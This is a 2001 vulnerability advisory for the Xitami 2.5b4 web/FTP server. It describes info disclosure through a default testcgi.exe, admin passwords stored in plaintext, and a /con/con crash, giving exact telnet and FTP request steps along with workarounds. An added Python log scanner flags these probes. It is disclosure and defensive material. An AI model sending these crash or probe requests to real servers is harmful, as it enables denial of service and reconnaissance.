
xitami-2.5b4.txt
Posted Nov 22, 2001
Authored by Zerologic | Site nssolution.net

Xitami WEB/FTP Server for Windows 95/98/NT/2k v2.5b4 has remote vulnerabilities which allow users to view sensitive system information via testcgi.exe. Passwords are stored in plain text. Denial of service is possible.

tags | exploit, remote, web, denial of service, vulnerability
systems | windows
SHA-256 | 963cbf8d5f403c450c746e48d4a87ee002babfa21848572bbe2f6ac1680a715f

Network Security Solutions Inc. Security Advisory
(Philippine based Security Company)

Http://www.Nssolution.net
Http://connect.to/nssi

]*** Xitami WEB/FTP release 2.5b4 Server Multiple Security Vulnerabilities ***[

Author: Abraham Lincoln
handle: zer0logic

Email : Abraham@nssolution.net, zer0logic@PrivacyX.Com,
Abraham@Digital-Defense-Network.Net

Date Discovered: November 29, 2000
Vendor: iMatix Corporation

Disclaimer:
This paper is intended for informational purposes only. The author is not
responsible for the use and/or potential effects of these advisories.
Read this at your own risk, or not at all.


1] 1st Vulnerability - TestCgi.exe file vulnerability

Version Affected: Xitami Web Server release 2.5b4
for Win 95 / 98 / NT / Win2k
Local : Yes
Remote: Yes
Risk: Medium

Problem Description:

- The default installation of Xitami Webserver ships a /cgi-bin directory containing TestCgi.exe. Any remote user can
run it from a browser and view information about your system and the webserver's directories, for example:
Http://www.Target.com/cgi-bin/testcgi

Sample output:

Environment Variables

COMPUTERNAME = MYSERVER
COMSPEC = C:\WINNT\system32\cmd.exe
HOMEDRIVE = C:
HOMEPATH = \
LOGONSERVER = \\MYSERVER
NUMBER_OF_PROCESSORS = 1
OS = Windows_NT
OS2LIBPATH = C:\WINNT\system32\os2\dll;
PATH = C:\WINNT\system32;C:\WINNT
PROCESSOR_ARCHITECTURE = x86
PROCESSOR_IDENTIFIER = x86 Family 6 Model 8 Stepping 3, GenuineIntel
PROCESSOR_LEVEL = 6
PROCESSOR_REVISION = 0803
SYSTEMDRIVE = C:
SYSTEMROOT = C:\WINNT
TEMP = C:\TEMP
TMP = C:\TEMP
USERDOMAIN = MYSERVER
USERNAME = Administrator
USERPROFILE = C:\WINNT\Profiles\Administrator
WINDIR = C:\WINNT
HTTP_ACCEPT_CHARSET = iso-8859-1,*,utf-8
HTTP_ACCEPT_LANGUAGE = en
HTTP_ACCEPT_ENCODING = gzip
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
HTTP_HOST = 127.0.0.1
HTTP_USER_AGENT = Mozilla/4.75 [en] (WinNT; U)
HTTP_CONNECTION = Keep-Alive
HTTP_CONTENT_LENGTH = 0
SERVER_SOFTWARE = Xitami
SERVER_VERSION = 2.5b4
SERVER_NAME = 127.0.0.1
SERVER_URL = http://127.0.0.1/
SERVER_PORT = 0
SERVER_PROTOCOL = HTTP/1.1
SERVER_SECURITY = -
GATEWAY_INTERFACE = CGI/1.1
REQUEST_METHOD = GET
QUERY_METHOD = GET
SCRIPT_PATH = cgi-bin
SCRIPT_NAME = /cgi-bin/testcgi
CONTENT_TYPE =
CONTENT_LENGTH = 0
REMOTE_USER = -
REMOTE_HOST = 127.0.0.1
REMOTE_ADDR = 127.0.0.1
PATH_INFO =
PATH_TRANSLATED = C:/Xitami/webpages
DOCUMENT_ROOT = C:/Xitami/webpages
CGI_ROOT = C:/Xitami/cgi-bin
CGI_URL = /cgi-bin
CGI_STDIN = C:\TEMP\pipe0001.cgi
CGI_STDOUT = C:\TEMP\pipe0001.cgo
CGI_STDERR = cgierr.log

The problem lies in the default installation of Xitami Webserver, which places testcgi.exe in the /cgi-bin directory.
A malicious user can use it to gather information about your system that can be used to penetrate the whole
system.

Work Around:
Delete the testcgi.exe file, or disable the cgi-bin directory in Xitami Administration under CGI properties. Never run
a default installation; always reconfigure your webserver after installing. Read the WWW Security FAQ, which covers
CGI vulnerabilities, at http://www.w3.org/Security/Faq/


2] 2nd Vulnerability - Plain text Password vulnerability

Version Affected: Xitami Web Server release 2.5b4
for Win 95 / 98 / NT / Win2k
Local : Yes
Remote: No
Risk: Medium

Problem Description:
- I discovered that Xitami Webserver stores the plain text password for Xitami Webserver Administration in the
defaults.aut file in the default installation folder of Xitami webserver, which is C:\Xitami. Even if you change the installation folder,
it is still the same.
Example:
defaults.aut
# Created at installation time
#
[/Admin]
admin="root123" <----- admin=username password=root123
[Private]
Jacky=robusta

The problem arises when an attacker gains physical access to the Xitami root directory and opens the file Defaults.Aut.
The attacker can use it to gain administrator access to webserver Administration, for example at http://localhost/admin:
the attacker enters the username and password stored in defaults.aut and then has full access to the
web server administration site.

If you move the password file to another folder, the next time you log on to the Xitami Web Administration site this error
appears --> Abort at smthttp:Resolve-Virtual-Hostname: (Have-Client-Request, Finished-Event). This makes the
webserver unusable and you need to reinstall the whole application.

Work around:
Don't leave your workstation or server open to physical access to the root directory of the Xitami web server, and always
change the default folder for the webserver instead of using C:\Xitami.

3] 3rd Vulnerability - Xitami Webserver and FTP Server for Win95/Win98 is Affected by /CON/CON exploit

Version Affected: Xitami Web Server release 2.5b4
for Win 95 / 98
Local : Yes
Remote: Yes
Risk: High

Problem Description:

- Xitami Webserver and FTP Server are still vulnerable to the /Con/Con bug of Windows 95 and 98, which causes the
Webserver and FTP Server to shut down or crash, and sometimes even the whole operating system gets a fatal error. The
application needs to be restarted to resume normal operation.

The problem occurs when the attacker sends this request to the Webserver --> GET /con/con HTTP/1.0 using a
telnet client. To send it to the remote host, type --> Telnet <Target IP> 80; once connected, enter the GET
/con/con HTTP/1.0 command and press Enter. The server will now crash or shut down if the operating system is not patched against the Con/Con bug.

On the FTP Server, log in as an anonymous user or any user that is allowed access to the FTP Server, then execute
this command: Ftp>cd /con/con. The FTP Server will disconnect you from the remote host and it will shut down or crash.

Work Around:
Install the Con/Con bug patch on your operating system. The patch is available at the Microsoft website or at http://packetstormsecurity.org/Win/ConConFix2.zip, because the bug also lies in your O.S.

Vendor Status: iMatix Corporation has been notified of this Vulnerability but no patch has been issued yet.
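
Added example (not part of the original advisory and not iMatix code): a log check for the two remotely reachable issues above, flagging requests for the default testcgi program and request paths that contain reserved DOS device names. It assumes Common Log Format access lines, generalizes beyond /con/con to the other reserved device names, and runs over constructed sample log lines.

```python
import re
from urllib.parse import unquote

# Reserved DOS device names. The advisory names only CON; the rest are an
# added generalization of the same path-handling problem.
DOS_DEVICES = {"con", "nul", "aux", "prn", "clock$", "config$"} | {
    f"{p}{n}" for p in ("com", "lpt") for n in range(1, 10)}

# Assumed log layout: Common Log Format, client first, request in quotes.
REQUEST_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+)[^"]*"')

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Nov/2000:10:00:01 +0800] "GET /index.htm HTTP/1.0" 200 1043',
    '192.0.2.44 - - [29/Nov/2000:10:02:13 +0800] "GET /cgi-bin/testcgi HTTP/1.0" 200 2310',
    '192.0.2.44 - - [29/Nov/2000:10:02:40 +0800] "GET /con/con HTTP/1.0" 500 0',
    '192.0.2.51 - - [29/Nov/2000:10:05:09 +0800] "GET /docs/%43ON/aux.txt HTTP/1.0" 404 0',
    '192.0.2.60 - - [29/Nov/2000:10:06:00 +0800] "GET /contact/console.htm HTTP/1.0" 200 512',
]


def classify_path(raw_path):
    """Return the set of findings for one request path."""
    path = raw_path.split("?", 1)[0]
    for _ in range(2):  # decode twice so %63on and %2563on both become "con"
        path = unquote(path)
    segments = [s for s in re.split(r"[\\/]+", path.lower()) if s]
    # Windows maps "con.txt" to the device too, so compare the name before
    # the first dot.
    bases = [s.split(".", 1)[0].rstrip() for s in segments]
    findings = set()
    if any(b in DOS_DEVICES for b in bases):
        findings.add("dos-device-path")
    if any(a == "cgi-bin" and b == "testcgi" for a, b in zip(bases, bases[1:])):
        findings.add("testcgi-probe")
    return findings


def scan_log(lines):
    """Return (client, path, findings) for every line that matches a check."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and (found := classify_path(m.group(3))):
            hits.append((m.group(1), m.group(3), sorted(found)))
    return hits


if __name__ == "__main__":
    for client, path, found in scan_log(SAMPLE_LOG):
        print(client, path, ",".join(found))
```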

NOTE:
Sorry for the grammar etc... because this is just a 5 minute exploit. If you have some questions email me. All spam mails and lame emails are just ignored. -zer0logic-

Related Links: Http://www.nssolution.net
Http://connect.to/nssi
Http://www.Digital-Defense-Network.Net


Feedback and Inquiries:
If you have any questions, inquiries, feedback, concerns and
updates, please don't hesitate to email us.

For Inquiries,Concerns and updates - Info@Nssolution.net

for Comments and Questions - Abraham@nssolution.net ,lincoln@privacyx.com
zer0logic@privacyx.com
IRC - Dal.net #DDN Undernet #Hackphreak

Copyright(c) 2000-2001 Network Security Solutions Inc.
Permission is hereby granted for the redistribution of this alert
electronically. If you wish to reprint or modify this document, contact us
first or email us at: info@Nssolution.Net